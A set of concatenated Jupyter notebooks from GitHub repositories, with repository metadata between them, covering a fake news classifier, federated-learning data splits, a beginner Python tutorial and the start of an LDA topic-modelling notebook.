result[x3[i]].append((data_list[day], each_data_per[day * len(overall) + i]))
# However, I also want to break it down by age instead of sex. In particular, I want to see the cases involving people
# - up to age 15 (or the age bin they belong to);
# - up to age 37;
# - and up to age 99
#
# all in the same plot.
create_confirmed_plot(data_er, max_ages=[15, 37, 99])
# Finally, I want to see if the weather affects how likely people are to get tested. To simplify, I'll consider a day to be "rainy" if it rained more than the previous day. Out of those rainy days, on how many were there fewer tests carried out than the previous day? Because the data will be noisy, I first want to smooth the data by replacing each value with the average of the values in a 7-day window around it. Then I will use the smoothened values for this calculation instead of the originals.
#
# Carmen says that this one line should do all that:
ratio = count_high_rain_low_tests_days(data_er)
print(f"A {ratio * 100:6.2f}% of rainy days affected the number of tests")
# Let's see what works!
| 5,292 |
/SAO_Fake_News_Predictor.ipynb
|
f8089bd661f9360af6ae4b36063129ea9b51f89f
|
[] |
no_license
|
owais-code/Tech-A-Thon---SAO-s_Fake_News_Predictor
|
https://github.com/owais-code/Tech-A-Thon---SAO-s_Fake_News_Predictor
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 31,804 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3.9.6 64-bit
# name: python3
# ---
# + [markdown] id="_QakZYWA0YB6"
# Team SAO presents to you a high accuracy model to predict whether the news is real or fake.
# + [markdown] id="FaIBmnXCknPl"
# **Dataset Description**
#
# 1. id: Unique serial number of the news
# 2. title: Title of a news
# 3. author: Author/Editor of the news article
# 4. content: The text of the article
# 5. label: a label that marks whether the news article is real or fake:
# 1: if Fake news
# 0: if real News
#
#
#
#
# + [markdown] id="k399dHafvL5N"
# Importing the Dependencies
# + id="-fetC5yqkPVe"
import numpy as np
import pandas as pd
import re
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
# + colab={"base_uri": "https://localhost:8080/"} id="1AC1YpmGwIDw" outputId="deb5c972-ac0a-43c1-f0d5-6cfa30e498fa"
import nltk
nltk.download('stopwords')#downloading stopwords package
# + colab={"base_uri": "https://localhost:8080/"} id="dxIOt3DowpUR" outputId="9f3409ac-c6bf-4276-8767-cbc9e00f2781"
# Printing stopwords in English
print(stopwords.words('english'))
# + [markdown] id="NjeGd1CLw_6R"
# Data Pre-processing
# + id="nCGcpu_1wzLw" colab={"base_uri": "https://localhost:8080/", "height": 502} outputId="b9e7eb9c-9b13-4279-8054-90741e8a9298"
# loading our train.csv dataset to a pandas DataFrame
news_dataset = pd.read_csv('train.csv')
# + colab={"base_uri": "https://localhost:8080/", "height": 166} id="aRgmbYSbxV4-" outputId="8d4581fc-fec7-4715-fa78-b2b3a1baa61b"
news_dataset.shape
# + id="jjJ1eB6RxZaS"
# To see starting few data entries
news_dataset.head()
# + id="QYkDi4SwxlKi"
# Here Team SAO is counting the number of missing values in our dataset
news_dataset.isnull().sum()
# + id="Mc04lQrhx57m"
# Replacing the null values with empty string to increase the accuracy of dataset
news_dataset = news_dataset.fillna('')
# + id="H7TZgHszygxj"
# merging the columns, author name and title present in the dataset
news_dataset['content'] = news_dataset['author']+' '+news_dataset['title']
# + id="cbF6GBBpzBey"
print(news_dataset['content'])#lets see what is in the content section
# + id="LfBtAvLtzEo6"
# separating the data & label and assigning varaible X and Y to them
X = news_dataset.drop(columns='label', axis=1)
Y = news_dataset['label']
# + id="oHPBr540zl1h"
print(X)
print(Y)
# + [markdown] id="0NwFcpqcz37a"
# What is Stemming ?
#
# Stemming is a method of reducing a word to its ROOT WORD
#
# like:
# coder, coding, codes --> code ||
#
# Let's use this feature
# + id="Ga_DaZxhzoWM"
port_stem = PorterStemmer()
# + id="zY-n0dCh0e-y"
def stemming(content):
    """
    Normalise a text for the classifier: strip non-alphabetic characters,
    lowercase, drop English stopwords, and Porter-stem the remaining words.
    Returns the processed words joined by single spaces.
    """
    words = re.sub('[^a-zA-Z]', ' ', content).lower().split()
    # PERF FIX: the original evaluated stopwords.words('english') inside the
    # comprehension condition — an NLTK corpus read plus an O(n) list scan
    # for every single word. Build the set once per call instead.
    stop_words = set(stopwords.words('english'))
    stemmed = [port_stem.stem(word) for word in words if word not in stop_words]
    return ' '.join(stemmed)
# + [markdown] id="rU619EGAtmFA"
# Now Applying stemming on content section of our dataset
# + id="MBUIk4c94yTL"
news_dataset['content'] = news_dataset['content'].apply(stemming)
# + id="xmwK-zyO5Stg"
print(news_dataset['content']) #to see the effect stemming had on our dataset i.e. all words comes to its root version
# + id="5ZIidnta5k5h"
#separating the data and label columns
X = news_dataset['content'].values
Y = news_dataset['label'].values
# + id="3nA_SBZX6BeH"
print(X) #to see what went in variable X
# + id="NgkFGXkg6HS4"
print(Y) #to see what went in variable Y
# + id="Iu2ZEBkL6QTm"
Y.shape
# + id="BMfepsQZ6TES"
# converting the textual data(STRING) to numerical data using vectorizer to make the model simpler.
vectorizer = TfidfVectorizer()
vectorizer.fit(X)
X = vectorizer.transform(X)
# + id="MJj5esbs7Nzy"
print(X)
# + [markdown] id="mKBRGiSQ7YCZ"
# Splitting the dataset to training & test data
#
# 1. 80% in training
# 2. 20% in test
# 3. Stratifying Y to ensure all training or test set doesn't get only one kind of outcome
#
#
#
#
# + id="VjMYwmBo7Pbx"
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, stratify=Y, random_state=2)
# + [markdown] id="rxDsQvgO8Oln"
# Training our Model: Bringing in Logistic Regression
# + id="HrSItcqc7qAy"
model = LogisticRegression()
# + id="fdVJ839l8Vgx"
model.fit(X_train, Y_train)
# + [markdown] id="sbPKIFT89W1C"
# Result time for the Model
# + [markdown] id="YG6gqVty9ZDB"
# **Checking Accuracy Score**
# + id="VgwtWZY59PBw"
# accuracy score on the training data
X_train_prediction = model.predict(X_train)
training_data_accuracy = accuracy_score(X_train_prediction, Y_train)
# + id="4L-r5mld-BFn"
print('Accuracy score of the training data : ', training_data_accuracy*100, "%") # printing accuracy score of our training data
# + id="Kgcn13oO-H6e"
# accuracy score on the test data
X_test_prediction = model.predict(X_test)
test_data_accuracy = accuracy_score(X_test_prediction, Y_test)
# + id="9TG0Yof1-vg2"
print('Accuracy score of the test data : ', test_data_accuracy*100, "%") # printing accuracy score of our test data
# + [markdown] id="Yun4seaE-6tV"
# So now we have got a nice score, let's predict now
# + id="lPjssDL_-zo8"
#Predicting News Id No. 48 for example
X_new = X_test[3]
prediction = model.predict(X_new) #predicting
print(prediction)
if (prediction[0]==0):
print('\t\tThe news is Real\n')
else:
print('\t\tThe news is Fake\n')
# -
print("Thanks\nTeam SAO")
nv1(x))
# +
x = torch.randn(1, 1, 3, 3)
describe(x)
conv1 = nn.Conv2d(in_channels=1, out_channels=2, kernel_size=2)
describe(conv1.weight)
describe(conv1(x))
| 6,058 |
/misc_notebook/generate_nn_ma.ipynb
|
f2d47072712689fc17bcf9058af41b4d1515dc6e
|
[
"BSD-2-Clause"
] |
permissive
|
pursueorigin/multi-center-fed-learning
|
https://github.com/pursueorigin/multi-center-fed-learning
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 16,753 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# < > == <= >= !=
# -
a = 10
b = 20
a<b
# +
# if <condition>:
# <operations>
# elif <condition>:
# <operations>
# else:
# <operations>
# +
if a>b:
print("a is greater")
elif a<b:
print("b is greater")
else:
print("Both are equal")
# +
a = int(input("Enter a = "))
b = int(input("Enter b = "))
if a>b:
print("a is greater")
elif a<b:
print("b is greater")
else:
print("Both are equal")
# +
# and or
a = int(input("Enter a = "))
b = int(input("Enter b = "))
c = int(input("Enter c = "))
if (a>b) and (a>c):
print("a is greater")
elif b>a and b>c:
print("b is greater")
elif c>a and c>b:
print("c is greater")
else:
print("Both are equal")
# -
a = int(input("Enter a = "))
b = int(input("Enter b = "))
o = input("Enter operator + - * / =")
if o =='+':
print(a+b)
elif o == '-':
print(a-b)
elif o == '*':
print(a*b)
elif o == '/':
print(a/b)
else:
print("Invalid operator")
a = int(input("Enter a = "))
b = int(input("Enter b = "))
o = input("Enter operator + - * / =")
if o =='+':
print(a+b)
elif o == '-':
print(a-b)
elif o == '*':
print(a*b)
elif o == '/' and b!=0:
print(a/b)
elif b == 0:
print("Value of b can not be zero.")
else:
print("Invalid operator")
# +
def add(a,b):
return a+b
def sub(a,b):
return a-b
def mul(a,b):
return a*b
def div(a,b):
return a/b
a = int(input("Enter a = "))
b = int(input("Enter b = "))
o = input("Enter operator + - * / =")
if o =='+':
print(add(a,b))
elif o == '-':
print(sub(a,b))
elif o == '*':
print(mul(a,b))
elif o == '/' and b!=0:
print(div(a,b))
elif b == 0:
print("Value of b can not be zero.")
else:
print("Invalid operator")
# +
def cal():
    """Repeatedly compute simple interest i = p*t*r/100 from user input.

    Prompts for principal, time and rate, prints the interest, and repeats
    while the user answers 'y'. ROBUSTNESS FIX: the original re-invoked
    cal() recursively to loop, which would eventually exhaust Python's
    recursion limit; a while loop has no such bound.
    """
    while True:
        p = float(input("Enter p = "))
        t = float(input("Enter t = "))
        r = float(input("Enter r = "))
        i = p*t*r/100  # simple interest formula
        print("The i = ",i)
        x = input("Enter y for more calculations = ")
        if x != 'y':
            print("The program is ended.")
            break
cal()
# +
# Nested If
# if <condition>:
# if <condition>:
# ...
# ..
# +
# Simple calculator: read two integers and an operator, dispatch to the
# matching arithmetic helper, and guard against division by zero.

def add(a,b):
    """Return the sum of a and b."""
    return a+b

def sub(a,b):
    """Return a minus b."""
    return a-b

def mul(a,b):
    """Return the product of a and b."""
    return a*b

def div(a,b):
    """Return a divided by b; caller must ensure b != 0."""
    return a/b

a = int(input("Enter a = "))
b = int(input("Enter b = "))
o = input("Enter operator + - * / =")
if o =='+':
    print(add(a,b))
elif o == '-':
    print(sub(a,b))
elif o == '*':
    print(mul(a,b))
elif o == '/':
    if b != 0:
        print(div(a,b))
    else:
        # BUG FIX: the original read `else b == 0:`, which is a SyntaxError;
        # a plain `else:` already covers the only remaining case (b == 0).
        print("Value of b can not be zero.")
else:
    print("Invalid operator")
# +
def area(l,b):
    """Return the area of an l x b rectangle.

    BUG FIX: the original returned a*b, silently reading the *global*
    variables a and b instead of the function's own parameters.
    """
    return l*b
def volume(l,b,h):
    """Return the volume of an l x b x h cuboid."""
    return l*b*h
l = int(input("Enter l = "))
b = int(input("Enter b = "))
h = int(input("Enter h = "))
x = input("Enter 1 for area 2 for volume = ")
if x == '1':
print(area(l,b))
elif x == '2':
print(volume(l,b,h))
else:
print("Invalid input")
# -
size=64,
validation_data=(x_test, y_test))
model.evaluate(x_test, y_test, verbose=1)
# +
num_workers = 40
n_train = len(y_train)
n_test = len(y_test)
idxs = np.random.permutation(n_train)
batch_idxs = np.array_split(idxs, num_workers)
for j in range(num_workers):
model = create_mlp()
train_features, train_labels = x_train[batch_idxs[j]], y_train[batch_idxs[j]]
model.fit(train_features, train_labels, batch_size=64, epochs=10, validation_data=(x_test, y_test), verbose=0)
Ws = model.get_weights()
with open("cifar10_{}.pb".format(j), 'wb+') as f:
pickle.dump(Ws, f)
# +
maps = {i: dataidx for i, dataidx in enumerate(batch_idxs)}
def saved_cls_counts(net_dataidx_map):
    """
    Count class labels per worker and pickle the result to 'cifar10_counts'.

    net_dataidx_map: dict mapping worker id -> sequence of training-set
    indices (here, the per-worker index splits built above).
    For each worker, builds {class_label: count} from the matching slice
    of the global y_train array, then dumps the whole mapping to disk.
    Returns None; the pickle file is the only output.
    """
    net_cls_counts = {}
    for net_i, dataidx in net_dataidx_map.items():
        # unq: distinct labels seen by this worker; unq_cnt: their frequencies
        unq, unq_cnt = np.unique(y_train[dataidx], return_counts=True)
        tmp = {unq[i]: unq_cnt[i] for i in range(len(unq))}
        net_cls_counts[net_i] = tmp
    with open('cifar10_counts', 'wb+') as f:
        pickle.dump(net_cls_counts, f)
saved_cls_counts(maps)
# -
| 4,285 |
/main.ipynb
|
5848a501d70de38d51d57a62779be77fb7c8f65c
|
[] |
no_license
|
gauravsaxena1983/SamplePythonProject
|
https://github.com/gauravsaxena1983/SamplePythonProject
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 904 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# 1. No spaces between them
# 2. It shouldnot start by a number
# 3. In place of space we write underscore (_)
# -
__a__ = 1
a = "2"
b = "2"
print(a + b)
a=2
a=a<<3
print(a)
print("hello {name1} and {name2}".format(name1="muzammil",name2="hasan"))
# +
# Pemdas Rule
# P = parathesis
# e = exponent
# m = multiplication
# d = divide
# a = addition
# s = subtration
a = (2+3)**2+4*5-1/1
print(a)
# -
print( 4/3*(2-1) )
print(4+3%5); print(7%5);print(16%15//16)
print(int(43.55+2/2));print('{0:.2}'.format(1/3))
if (9 < 0) and (0 < -9):
print("hello")
elif (9 > 0) or False:
print("good")
else:
print("bad")
not(10<20) and not(10>30)
not(10<20) or not(10>30)
if 7>=8 :
print ("yes") ; print ("yes"); print ("yes")
print ("yes")
print ("yes")
h=[]
h
h=["muzammil",36,5.4,81,True,[304,204],81]
h;h[5][1]
h.index(81,4)
h.count(81)
h[3]
h=["muzammil","hasan","ali","waqar"]
h
g=h
g[0]="hasan"
h
h[2]="syed"
h
if 'Syed' in h:
print(1)
else:
print(2)
h.append("ali")
h
# +
names1 = ['Amir', 'Bala', 'Charlie']
names2 = [name.lower() for name in names1]
print(names2[2][0])
# -
names1+=names2
print(names1)
h+=["syed","syed"]
h
h.insert(4,"qaiser")
h
z=h[2:5]
x=z[:2]
p=z[1:]
print(z)
print(x)
print(p)
del h[3]
h
h.remove("syed")
h
z=h.pop()
z
z=h.pop(1)
z
h
h[1].upper()
h
for name in h:
print(name)
if name == "muzammil":
print ("your are authorized")
# sets
s={1,2,3,1,2,3,4,5,6,7,8,}
s
print(s) # only give unique values no duplicates
# +
# tuple
# Tuples is just like a list with some diffrences
# List values is placed in square brackets but tuple values is placed in round brackets
tup = ("muz","smh", "arc", "dec", "wes", "ces", "scb", "sbp",)
print (tup)
tup.append("car")
# -
print(tup[:3]) ;print(tup[4:7]) ; tup_Dup = tup[4:7]; print (tup_Dup);print(tup.count("dec"));print(tup.index("dec"))
for elements in tup:
print (elements)
if elements == "ces": break
# +
L1 = ["a","b"]
L2 = [1,2,3,4,5]
for dat1 in L1:
for dat2 in L2:
print (dat1+"_"+str(dat2),end=",")
# -
print (L1)
L1= ["hasan syed","muzammil hasan","farooq Mohammad"]
print(L1)
# +
L2=L1 ;print (L2); L2.insert(41,"hasan1");print(L1);print(L2)
# -
print (L1)
L2=L1.copy() # making a copy
print (L2)
L2.clear()
print (L2)
L2.append("syed") ;print (L1); print(L2) # No impact on the original list
L1.remove("hasan")
print(L1)
input2 = input("Enter your name: ")
input2.lower() # it does not need to be placed in a variable
L1[0].lower()
L1[0].title()
L1[0].upper()
L1[1].lower()
L1[2].swapcase()
L1[2].capitalize()
L1[2].title()
print('hasan '*3)
# print even numbers only
for i in range(0,100,2):
print (i,end=",")
cls
for i in range (1,10):
print(i*"*")
list1=range(0,10,2); print(list1);list2 = list();print(list2)
list1=list(range(0,10,2)); print(list1);print(list1[0]);print(list1[-1]);print(max(list1));print(list1[:-2])
print(list("hello")); print(len(list("hello")));print(max(list("hello")))
# +
import random
print(random.shuffle(["hi","gt","ty"]))
# -
for i in list1:
print(i,end=",")
for i in range (0,10):
if i==5:
break
else:
print("The loop run fine completely")
print("the loop broke")
for i in range (0,10):
if i==11:
break
else:
print("The loop run fine completely")
for i in range (10):
if i!=5:
break
else:
print (i)
else:
print ("here")
print("here i am")
x= (x for x in range(3))
for i in x:
print(i)
print(type(x))
sentence = "my name is muzammil"
print(sentence)
for i in sentence.split():
print(i)
a=[0,1,2,3]
i=-2
for i in a:
print (i)
i+=1
a={}
a[2] ="hi"
a[1] =[1,2,3,]
print(a[1][1])
print(a)
a={1:"A",2:"B"}
b={3:"C",4:"D"}
a.update(b)
print(a)
a.clear()
print(a)
for i in range(len(list1)): print(list1[i])
for i in range(-2,len(list1),2):
print(list1[i])
st= "string"
print(st[0]) # string is also a list
st[4]
l1= [2, 33, 222, 14, 25] ; print(l1[-1]); print(l1[:-4]);print(l1[2:5]);print(l1[:]);print(l1*2)
print([0.5 *x for x in range(0,4)])
names1 = ['Amir', 'Bear', 'Charlton Hudston', 'Daman']
names2 = names1
names2[1]="Bear1"
print(names1)
print([11,222,25]<[11,2,25])
print(names1[2].title())
print(names1[2].capitalize())
names1 = ['Amir', 'Bear', 'Charlton', 'Daman']
names2 = names1[:]
names2[1]="Bear1"
print(names1)
numbers = [1, 2, 3, 4]
numbers.append([5,6,7,8])
print(len(numbers))
print(numbers)
list1 = [1, 2, 3, 4]
list2 = [5, 6, 7, 8]
print(len(list1 + list2))
print(list1 + list2)
# +
a=[1,2,3]
b=a.append(4)
print(a)
print(b)
b=a
print(a)
print(b)
b=a.copy()
print(a)
print(b)
b is a
# -
a=[13,56,17]
a.append([87])
a.extend([45,67])
print(a)
a=list((45,)*4)
print((45)*4); print(45*4);print("hi"*4)
print(a)
word1="Apple"
word2="Apple"
list1=[1,2,3]
list2=[1,2,3]
print(word1 is word2)
print(list1 is list2)
# +
names1 = ['Amir', 'Bear', 'Charlton', 'Daman']
names2 = names1
names3 = names1[:]
names2[0] = 'Alice'
names3[1] = 'Bob'
sum1 = 0
for ls in (names1, names2, names3) :
if ls[0] == 'Alice':
sum1 += 1
if ls[1] == 'Bob':
sum1 += 10
print(sum1)
# +
w="hello"
v=('a', 'e', 'i', 'o', 'u')
l1=[x for x in w if x in v]
print(l1)
# -
names = ['Amir', 'Bear', 'Charlton', 'Daman']
print(names[-1][-1])
t=32.00
print([round((x-32)*5/9) for x in t])
[(x**2) for x in range(0, 13)] # list comprehension
[x for x in range(0, 20) if (x%2==0)]
print([i for i in range(1, 101) if int(i*0.5)==(i*0.5)])
# [j for i in range(2,8) for j in range(i*2, 50, i)]
print("hi")
print(2**4);print([(x**2) for x in range(1, 13)])
print ("muzammil")
list1 = [1,2,3,4,5,6,7,8]
list2 = ["a","b","c"]
print (list1)
print (list2)
for l1 in list1:
for l2 in list2:
print (str(l1)+l2,end="")
# +
# Dictionary is just like an advance form of list. In list every value has an index Number but in Dictionary there is a
# Key-value pair
dict1 = {
"name": "muzammil",
"rank" : 4,
0: "zero",
"ID":420.558,
58:"its a code",
68.2: "its another code"
}
print (dict1)
# -
list1
dict1
rank1 = dict1["rank"]
print(rank1)
print (dict1[68.2]);print (dict1[58])
dict2 = dict1
name = dict2["name"]; print (name)
dict2["name"]="hasan"
print (dict1); print(dict2)
dict4={}
dict4["name"]="Syed"
dict4[0]="Waqar"
dict4[1]="Mujtaba"
dict4[2]="Muzammil"
dict4
del dict4[0]
dict4
dict4[1]="Mujtaba Hasan"
dict4
for i in dict4:
print (i)
for i in dict4.values():
print (i)
dict4.keys()
dict4.values()
for K, V in dict4.items():
print (str(K)+" : "+str(V))
for K, V in dict4.items():
print (str(K)," : ",str(V))
dict3=dict1
dict3
dict3 ={"ggg":42342242}
dict3
name = dict1["name"]
print(name)
dict1
dict1[254]="Hasan"
dict1
dict1[254]="waqar"
dict1
dict1[254]="waqar"
dict1
dict1["tttt"]="shhhhhh"
dict1
del dict1["tttt"]
dict1
l1=[]
for i in range (0,5):
l1.append(dict1)
print(l1)
l1[0]
l1[6][254]="dfasdfsfasfs"
l1[1]["name"]="hasan"
l1[1]
l1[6]["muzammil1"]="yyyyyyyy"
l1[6]
l1[7]=l1[6]
print(l1)
l1.append(dict1)
print(l1)
l1.append(dict4)
print(l1)
dict5={}
for i in range(0,4):
dict5[i]=dict4
del dict5[2]
print(dict5)
l1=[1,"hasan","syed",4,5,2.5,True,"Muzammil"]
l1
dict6={}
for i in range(2,6,1):
dict6[i-6]=l1
print(dict6)
print(len(dict6))
def addNames():
firstName="Syed"
lastName="Hasan"
print(firstName+lastName)
addNames()
def addNames(firstName,lastName):
print(firstName+lastName)
addNames ("Muzammil","HAsan") # positional arguments
addNames(firstName="Muzammil",lastName="Hasan") # keyword arguments
addNames(lastName="Hasan",firstName="Muzammil") # keyword arguments
def addNames(firstName,lastName,middleName=" S"): # optional arguments
print(firstName+lastName+middleName)
addNames("muzammil"," hasan"," Syed");addNames("muzammil"," hasan")
def calPercent(marksObtained,totalMarks=100):
print(marksObtained/totalMarks)
calPercent(75)
def calPercent(marksObtained, totalMarks=100 ,*otherInfo): # unknown number of arguments passed as a tuple
print(otherInfo)
print(marksObtained/totalMarks)
calPercent(85,100,"Muzammil is Passed")
def calPercent(marksObtained, totalMarks=100 ,**otherInfo): # unknown number of arguments passed as a dictionary
print(marksObtained/totalMarks)
print(otherInfo)
calPercent(85,100,Name="Muzammil",status="passed", school="la Canadiana")
# +
x=50
def funct():
# global x
x=2
print(x)
funct()
print(x)
# -
x=[1,2,3,4]
def l1(x):
x=x+[6,7]
print(x)
l1(x)
print(x)
def foo():
total=1
total+=1
return total
foo()
x=[1,2,3,4,1]
print(x)
x={1,2,3,4,1}
print(x)
# +
def adding(a=4,b=4):
print(a+b)
a=int(input("enter a"))
b=int(input("enter b"))
if a<0 and b<0:
adding()
else:
adding(a,b)
# +
def adding(a=4,b=4):
    """Return the list of integers from a through b, inclusive.

    With the defaults (a=4, b=4) the result is [4]; when a > b the
    result is an empty list, exactly like range().
    """
    return list(range(a, b + 1))
a=int(input("enter a"))
b=int(input("enter b"))
print(adding())
print(adding(a,b))
# +
def compare_numbers(a=4,b=4):
    """Print which of a and b is larger (tab-separated output).

    FIXES: the original (1) was named `max`, shadowing the Python builtin
    for the rest of the notebook session, and (2) printed nothing at all
    unless a > b. Both the a < b and a == b cases are now reported.
    """
    if a>b :
        print("maximum number is",a,"Minimum number is",b,sep="\t")
    elif b>a:
        print("maximum number is",b,"Minimum number is",a,sep="\t")
    else:
        print("Both numbers are equal:",a)
a=int(input("enter a"))
b=int(input("enter b"))
compare_numbers(a,b)
# +
def total_of(values):
    """Return the integer sum of an iterable of numbers or digit characters.

    Each element is coerced with int(), so both a tuple of ints and a
    string of digit characters (as typed at the prompt below) work.
    FIX: the original was named `sum` with a parameter named `list`,
    shadowing two builtins for the rest of the notebook session.
    """
    total=0
    for item in values:
        total+=int(item)
    return total
a = input ("Enter series of numbers to be add")
t=total_of(a)
print(t)
print(total_of((1,2,3,4,5)))
# +
def describe_pet(animal_type, pet_name="Sam"):
"""Display information about a pet."""
print("\nI have a " + animal_type + ".")
print("My " + animal_type + "'s name is " + pet_name.title() + ".")
describe_pet ("dog","harry")
describe_pet (pet_name="harry",animal_type="dog")
describe_pet ("dog")
describe_pet (pet_name="jami")
# +
def build_profile(first, last, **user_info):
    """Build a dictionary containing everything we know about a user."""
    # Seed the profile with the two required fields, then fold in any
    # extra keyword arguments the caller supplied.
    profile = {'first_name': first, 'last_name': last}
    profile.update(user_info)
    return profile
user_profile = build_profile('albert', 'einstein',location='princeton',field='physics')
print(user_profile)
# +
keep_looping = True
w=0
while keep_looping == True:
print("value",w)
w+=1
if w==10:
keep_looping = False
else:
print ("I am out")
# -
keep_looping = True
w=0
while keep_looping == True:
print("value",w)
w+=1
if w==10:
# keep_looping = False
break
else:
print ("I am out")
# +
class Car():
color="green"
print(Car().color)
B= Car()
B.color= "blue"
print (B.color)
# +
class Car():
    """A car described by its number of doors and engine size."""

    def __init__(self, doors, engine):
        # Keep the constructor arguments as public attributes.
        self.doors = doors
        self.engine = engine

    def describeCar(self):
        """Print the door count and engine size, separated by a space."""
        print(f"{self.doors} {self.engine}")
car1 = Car(4,2000)
car1.describeCar()
# +
class Red:
def feeling():
return "Lucky!"
r = Red()
print(r.feeling())
# +
class Red:
def feeling(self):
return "Lucky!"
r = Red()
print(r.feeling())
# +
class Horrible:
def bad_code(weird): # you can any varible instead of self
return "Don't write code like this"
h = Horrible()
print(h.bad_code())
# -
"Hello"[0]
# +
class patient():
    """A patient record holding a name and an age."""

    def __init__(self, name, age):
        self.name = name
        self.age = age

    def checkage(self):
        """Report whether the patient is a minor (under 18)."""
        # NOTE(review): "partient" spelling kept byte-for-byte from the
        # original output messages.
        if self.age < 18:
            label = "minor partient with age ="
        else:
            label = "not a minor partient with age ="
        print(label, self.age)

    def changeage(self):
        """Reset the patient's age to the fixed value 20."""
        self.age = 20
p1=patient("saad",12)
p1.changeage()
p1.checkage()
# +
greeting= '''
hello this is my
you are looking for
where are you
look for me
'''
with open("D:\PIAIC\Python_Hello_World\myfile.txt", "w") as f:
f.write("hello world this is my file")
f.write(greeting)
with open("D:\PIAIC\Python_Hello_World\myfile.txt", "r") as f:
filetext = f.read()
print(filetext)
# +
with open("D:\PIAIC\Python_Hello_World\myfile.txt", "a") as f:
f.write("\n \n this is the new appended text")
with open("D:\PIAIC\Python_Hello_World\myfile.txt") as f:
print(f.read())
# -
with open("D:\PIAIC\Python_Hello_World\myfile.txt") as f:
print(f.readline())
print(f.readlines())
# +
# working with csv files
import csv
with open("D:\PIAIC\Python_Hello_World\myfile.csv","w",newline="") as f:
data_handler= csv.writer(f,delimiter=",")
data_handler.writerow(["Name","father Name","age"])
data_handler.writerow(["Muzammil","Mamnoon","37"])
with open("D:\PIAIC\Python_Hello_World\myfile.csv","a",newline="") as f:
data_handler= csv.writer(f,delimiter=",")
data_handler.writerow(["Muddasssir","Mamnoon","33"])
data_handler.writerow(["Hina","Mamnoon","35"])
data=[]
with open("D:\PIAIC\Python_Hello_World\myfile.csv","r",) as f:
data_handler= csv.reader(f)
for each_line in data_handler:
data+=each_line
print (data)
# +
# You can't save a Python list in a text file. You can only save a text string.
# JavaScript Object Notation = json
import json
d1={
0:{"Name":"Hasan","father Name":"Mamnoon","age":37},
1:{"Name1":"Hasan1","father Name1":"Mamnoon1","age1":37},
3:[1,2,3,4,5]
}
with open("D:\PIAIC\Python_Hello_World\myfile.json","w",) as f:
json.dump(d1,f)
# with open("D:\PIAIC\Python_Hello_World\myfile.json","a",) as f:
# json.dump(dir1,f)
with open("D:\PIAIC\Python_Hello_World\myfile.json","r") as f:
data=json.load(f)
print(data)
# -
try:
print(5/0)
except ZeroDivisionError:
print ("print error")
# +
flag =1
while flag:
n1 , n2= input ("enter numbers to be divided : D/N ")
print(n1)
print(n2)
if int(n2)==0 :
flag=0
try:
print("division result :", int(n1)/int(n2))
except ZeroDivisionError:
print ("1. some error, you attempted to divide by zero")
except TypeError:
print ("1. some error, tye Error")
else:
print("2. ran smoothly")
finally:
print("3. this is fianlly block")
# -
n1 , n2= input ("enter numbers to be divided : D/N ")
try:
print("division result :", n1/int(n2))
except ZeroDivisionError:
print ("1. some error, you attempted to divide by zero")
# except TypeError:
# print ("1. some error, tye Error")
except FileNotFoundError:
print ("1. some error,File not found ")
except:
print ("1. some error,this catches everything ")
else:
print("2. ran smoothly")
finally:
print("3. this is fianlly block")
| 15,004 |
/lda_news.ipynb
|
4a5490c469de6789277ec9c3e52fc0aa8bd346d0
|
[] |
no_license
|
yingxiaoGuo/text_analysis
|
https://github.com/yingxiaoGuo/text_analysis
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 147,664 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # LDA and Document Similarity
#
# We are again working with the same fake news articles supplied by Kaggle.
#
# **I do not endorse and am not expressing any political affiliation or intent expressed in the articles in this dataset.**
#
# We will explain LDA and train an LDA model on this corpus of fake news to see what topics emerge.
#
# We will hold out some documents for testing to infer their topic distributions and compare them to the rest of the corpus to find the most similar documents.
#
# We use the [gensim](https://radimrehurek.com/gensim/models/ldamodel.html) package to do this, as it is highly optimised in C and has many features that make the implementation easy to use and very flexible.
# import dependencies
# %matplotlib inline
import pandas as pd
import numpy as np
import nltk
from nltk.corpus import stopwords
import gensim
from gensim.models import LdaModel
from gensim import models, corpora, similarities
import re
from nltk.stem.porter import PorterStemmer
import time
from nltk import FreqDist
from scipy.stats import entropy
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("darkgrid")
# Read in data; only keep essential columns and English language articles
df = pd.read_csv('fake.csv', usecols = ['uuid','author','title','text','language','site_url','country'])
df = df[df.language == 'english']
df = df[df['text'].map(type) == str]
df['title'].fillna(value="", inplace=True)
df.dropna(axis=0, inplace=True, subset=['text'])
# shuffle the data
df = df.sample(frac=1.0)
df.reset_index(drop=True,inplace=True)
df.head()
# Define some functions to clean and tokenize the data
# +
def initial_clean(text):
    """
    Clean raw article text for topic modelling.

    Removes URLs (http/https/www) and email-like tokens, strips every
    character that is not a letter or a space, lower-cases the result,
    and returns it as a list of word tokens via nltk.word_tokenize.

    Parameters: text (str) - raw article text.
    Returns: list[str] - lower-cased alphabetic tokens.
    """
    # Drop any token attached to http(s), www, or an @ sign (URLs, emails).
    # NOTE(review): this is a non-raw string with \S and \@ escapes; it works
    # today but should be a raw string r"..." to avoid invalid-escape warnings.
    text = re.sub("((\S+)?(http(s)?)(\S+))|((\S+)?(www)(\S+))|((\S+)?(\@)(\S+)?)", " ", text)
    text = re.sub("[^a-zA-Z ]", "", text)  # keep letters and spaces only
    text = text.lower() # lower case the text
    text = nltk.word_tokenize(text)
    return text
# English stopwords stored as a set: membership tests in the comprehension
